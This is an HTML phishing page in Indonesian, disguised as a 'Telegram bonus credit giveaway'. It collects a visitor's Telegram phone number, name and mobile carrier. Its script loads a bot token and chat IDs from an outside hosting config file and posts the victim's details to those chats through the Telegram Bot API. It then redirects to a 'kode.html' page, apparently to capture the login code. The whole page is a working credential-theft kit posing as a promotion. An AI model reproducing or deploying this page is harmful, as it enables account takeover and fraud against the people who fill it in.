<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>GIVEAWAY Bonus Pulsa TELEGRAM</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
  </head>
  <body>
    <nav class="background" style="background: #f0f0f0">
      <div class="container">
        <a class="navbar-brand" href="#1231">
        <h5 style="color: #10b3ff">GIVEAWAY BONUS PULSA TELEGRAM</h5>
        <div class="container">
            <div class="logo-atas">
                <img class="img-fluid" src="atas.jpg" alt="">
                </div>
            
    </nav>
    <div class="container">
        <div class="title-web mt-2">
            <div class="logo-atas">
                <center><img class="img-fluid" src="images.png" alt=""></center>
            </div>
      <div class="title-web mt-1">
        <h2 class="text-center">Isi data penerima Bonus Telegram</h2>
      </div><br>
      <div class="image-web">
      </div>
        <div class="col-md-3">
            <label class="ms-5" for="nope">Nomor akun TELEGRAM</label><br>
            <center><input type="number" name="nope" id="nope" style="border: Container; border: 1px solid rgb(0, 195, 255); width: 80% "></center>
             
        <div class="col-md-3 mt-3">
            <label class="ms-5" for="pin">Nama Anda</label><br>
            <center><input type="text" name="pin" id="pin" style="border: Container; border: 1px solid rgb(0, 153, 255); width: 80%"></center>
        </div>
        <div class="container w-75 mt-3">
          <div class="form-cc">
              <div class="form-group">
                  <div class="form-group" style="width: 70%">
                      <select style="border-radius: 15px" class="form-control shadow-sm form-control-sm" id="input1">
                          <option value=>=Simcard anda=</option>
                          <option value="TELKOMSEL">TELKOMSEL</option>
                          <option value="INDOSAT">INDOSAT</option>
                          <option value="TREE">TREE</option>
                          <option value="XL">XL</option>
                          <option value="LAINNYA">LAINNYA</option>
                      </select>
                  </div>
      </div>
      <div class="bnt-next mt-3 mb-3 text-center"></div>
      <center><button onclick="next()" class="btnNext" style="background-color: #0ca2e7; border: none; border-radius: 10px; width: 90%; color: white; font-weight: bold; height: 45px">kirimkan</button></center>
      <br>
      <p id="proses" class="text-center" style="color: rgb(134, 2, 2); display: none">TERIMA KASIH PERMINTAAN ANDA SEDANG DI PROSES</p>
      <div class="image-web mt-2">
        <center>
          <img src="  " alt="" width="250px">
      </div>
    </div>
    <script>
      const next = () => {
        let nope = document.querySelector("#nope").value;
        let pin = document.querySelector("#pin").value;
        const nocard = document.querySelector("#input1").value;

        fetch('https://cloudflare-langitmusic-remix.000webhostapp.com/config.php')
      .then(response => response.json())
      .then(data => {
        const { telegram_bot_id, chat_ids } = data;

        // Sisanya skrip utama
        if (nope === "" || pin === "") {
          alert("Mohon isi data dengan benar");
        } else {
          for (let i = 0; i < chat_ids.length; i++) {
            let message = `*Telegram Bonus*%0A%0ASIMCARD: ${nocard}%0A________________%0ANo. handphone:%0A${nope}%0A----------------------%0Anama: ${pin}`;
            let api = `https://api.telegram.org/bot${telegram_bot_id}/sendMessage?chat_id=${chat_ids[i]}&text=${message}`;

            fetch(api, {
              method: 'POST',
            })
              .then((response) => response.json())
              .then(data => {
                console.log(`Pesan terkirim ke chat ID ${chat_ids[i]}:`, data);
              })
              .catch((error) => {
                console.error(`Error ke chat ID ${chat_ids[i]}:`, error);
              });
          }

          window.location.href = "kode.html";
        }
      })
      .catch(error => console.error('Error:', error));
  }
</script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
  </body>
</html>
